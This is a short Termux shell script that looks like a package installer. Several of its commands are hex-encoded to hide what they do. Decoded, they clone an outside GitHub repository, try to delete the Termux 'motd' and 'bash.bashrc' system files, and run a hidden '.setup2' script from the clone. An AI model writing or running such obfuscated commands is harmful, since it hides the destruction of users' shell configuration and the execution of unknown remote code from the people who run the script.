bash pkgs
bash gits
bash lolcat
pkg install wget
pip install lolcat
pkg install git
cd
git clone $'\x68\x74\x74\x70\x73\x3A\x2F\x2F\x67\x69\x74\x68\x75\x62\x2E\x63\x6F\x6D\x2F\x48\x61\x63\x6B\x65\x72\x73\x6D\x39\x2F\x54\x65\x72\x6D\x75\x78'
cd
cd $'\x2F\x64\x61\x74\x61\x2F\x64\x61\x74\x61\x2F\x63\x6F\x6D\x2E\x74\x65\x72\x6D\x75\x78\x2F\x66\x69\x6C\x65\x73\x2F\x75\x73\x72\x2F\x65\x74\x63\x2F'
$'\x72\x6d\x20\x6d\x6f\x74\x64'
cd 
cd $'\x2F\x64\x61\x74\x61\x2F\x64\x61\x74\x61\x2F\x63\x6F\x6D\x2E\x74\x65\x72\x6D\x75\x78\x2F\x66\x69\x6C\x65\x73\x2F\x75\x73\x72\x2F\x65\x74\x63\x2F'
$'\x72\x6d\x20\x62\x61\x73\x68\x2e\x62\x61\x73\x68\x72\x63\x0a\x63\x64\x20\x0a\x63\x64\x20\x54\x65\x72\x6d\x75\x78\x0a\x62\x61\x73\x68\x20\x2e\x73\x65\x74\x75\x70\x32'
